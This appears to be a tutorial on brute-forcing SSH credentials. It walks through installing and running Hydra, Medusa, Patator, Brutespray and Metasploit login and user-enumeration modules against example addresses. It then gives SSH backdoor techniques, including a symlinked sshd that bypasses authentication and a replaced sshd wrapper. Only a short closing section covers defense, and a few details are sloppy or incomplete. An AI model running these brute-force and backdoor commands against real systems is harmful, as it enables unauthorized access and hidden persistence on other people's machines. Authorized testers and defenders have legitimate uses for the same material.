Mastering SSH Password Brute-Force: Tools, Techniques, and Defense Strategies

SSH Password Brute-Force: Application Scenarios and Approach

SSH (Secure Shell) is a widely used secure protocol for remote login and other network services on Linux, Windows, and many UNIX platforms. It prevents information leakage during remote management. When no vulnerability is available, attackers may resort to brute‑forcing SSH credentials.

(1) Gaining root via remote command execution (e.g., Structs). (2) Privilege escalation through a webshell. (3) Reading all local files via local file inclusion. (4) Accessing internal hosts after obtaining network entry. (5) Direct SSH access when the external SSH port is open.

In these scenarios, attackers often target the /etc/shadow file for password cracking, but when no exploitable vulnerability exists, they must brute‑force SSH accounts directly.

1. Using Hydra for SSH Password Brute-Force

1.1 Overview

Hydra, developed by the THC project, is a powerful online password‑cracking tool that supports almost all protocols. Its effectiveness depends on the strength of the password dictionary used.

1.2 Installation

Debian/Ubuntu

sudo apt-get install libssl-dev libssh-dev libidn11-dev libpcre3-dev libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev firebird-dev libncp-dev hydra

RedHat/Fedora

yum install openssl-devel pcre-devel ncpfs-devel postgresql-devel libssh-devel subversion-devel

CentOS

# tar zxvf hydra-7.6-src.tar.gz
# cd hydra-7.6-src
# ./configure
# make
# make install

1.3 Using Hydra

Hydra is pre‑installed on Kali and BackTrack. It can be launched via the GUI or by running /usr/local/bin/hydra. Example command:

hydra -l root -P pwd2.dic -t 1 -vV -e ns 192.168.44.139 ssh

To save results:

hydra -l root -P pwd2.dic -t 1 -vV -e ns -o save.log 192.168.44.139 ssh

If libssh support is missing, the following commands install it and recompile Hydra:

yum install cmake
wget http://www.libssh.org/files/0.4/libssh-0.4.8.tar.gz
tar zxf libssh-0.4.8.tar.gz
cd libssh-0.4.8
mkdir build
cd build
cmake -DCMAKE_INSTALL_PREFIX=/usr -DCMAKE_BUILD_TYPE=Debug -DWITH_SSH1=ON ..
make
make install

2. Using Medusa for SSH Brute-Force

2.1 Overview

Medusa is a fast, parallel, modular password‑cracking tool that supports many protocols. It is more stable than Hydra but supports fewer modules.

2.2 Installation

Git clone

git clone https://github.com/jmk-foofus/medusa.git
cd medusa
./configure
make
make install

2.3 Parameters

medusa -h host -u username -P password_file -M ssh -t threads -e ns -f

2.4 Example

medusa -M ssh -h 192.168.44.139 -u root -P pwd2.dic

3. Using Patator for SSH Brute-Force

3.1 Installation

git clone https://github.com/lanjelot/patator.git
cd patator
python setup.py install

3.2 Usage

Run ./patator.py to view help. The ssh_login module is used for SSH.

./patator.py ssh_login host=192.168.157.131 user=root password=FILE0 0=/root/newpass.txt

4. Using Brutespray for SSH Brute-Force

4.1 Installation

Download from GitHub and install:

git clone https://github.com/x90skysn3k/brutespray.git
cd brutespray
pip install -r requirements.txt

4.2 Parameters

brutespray.py -f nmap.xml -u root -p toor --threads 5 --hosts 5

5. Using Metasploit (MSF) for SSH Brute-Force

5.1 Modules

Search with search ssh to list available modules, such as auxiliary/scanner/ssh/ssh_login and auxiliary/scanner/ssh/ssh_enumusers.

5.2 User Enumeration

use auxiliary/scanner/ssh/ssh_enumusers
set rhost 192.168.17.147
set USER_FILE /root/user
run

5.3 Version Scanning

use auxiliary/scanner/ssh/ssh_version
set rhosts 192.168.157.147
run

5.4 Password Brute-Force

use auxiliary/scanner/ssh/ssh_login
set rhosts 192.168.157.147
set USER_FILE /root/user.txt
set PASS_FILE /root/pass.txt
run

6. SSH Backdoors

6.1 Soft‑link Backdoor

ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=33223;

Connect with ssh root@target_ip -p 33223 to bypass authentication.

6.2 SSH Server Wrapper Backdoor

cd /usr/sbin
mv sshd ../bin
vi sshd   # insert Perl wrapper code
chmod 755 sshd

6.3 Using socat

socat STDIO TCP4:target_ip:22,sourceport=19526

6.4 SSH Public‑Key Authentication

chmod 600 ~/.ssh/authorized_keys
chmod 700 ~/.ssh

7. SSH Brute‑Force Command Summary

All tools (Hydra, Medusa, Patator, Brutespray, MSF) can successfully crack SSH credentials. Hydra and Medusa are C‑based and require compilation; Patator and Brutespray are Python‑based. Brutespray leverages Nmap scan results. Use logging options ( -o save.log, -O ssh.log, etc.) to record successful attempts.

8. SSH Brute‑Force Defense

Change the default SSH port in /etc/ssh/sshd_config.

Restrict allowed IPs via /etc/hosts.allow.

Deploy DenyHosts to block repeated failed attempts.

Installation of DenyHosts:

# tar -zxvf DenyHosts-2.6.tar.gz
# cd DenyHosts-2.6
# python setup.py install

Configure denyhosts.cfg (e.g., thresholds, log locations) and enable the service to start on boot.

By following these practices, administrators can significantly reduce the risk of successful SSH brute‑force attacks.